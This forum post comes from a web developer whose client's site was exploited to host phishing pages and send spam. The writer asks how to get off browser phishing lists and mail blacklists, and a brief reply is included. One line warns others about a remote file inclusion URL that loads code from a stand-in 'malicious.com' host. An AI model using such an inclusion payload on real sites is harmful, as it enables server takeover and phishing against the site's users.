Hi There,

I work as a webdev for a company which does small business web platforms built on open source software (joomla, vtiger, etc.).

Recently one of our sites was exploited (FYI, make sure joomlalib is on the latest version if you use it! It's exploitable by going to standalone/stubjambo.php?baseDir=http://malicious.com/exploit.txt?) and the attacker managed to get some phishing pages onto our customer's platform, and send out around 20k emails before we even knew what was happening.

I've managed to plug the hole and block access to offending files, but the damage to our client is already done – firefox and opera are now reporting it as a phishing site, and it's possible we're blacklisted form Yahoo (still in the process of checking that)

SO – my question: How can I get my site removed from the phishing blacklists? There doesn't seem to be any links on google about it, the only thing to is to go to Help->report phishing site in firefox, which takes you to a page where you can anonymously report incorrectly marked phishing sites. But it's completely anonymous, and that's not really good enough – it's costing our client (and therefore, us) business.

And another question: How can I check the mail blacklists and, if we seem to be on there, how do I request to be removed from them?

For the notice in the browser you can only wait and report a false positive in our own borwser. It will take some some.

For mail blacklist you can use https://www.spamhaus.org/sbl/
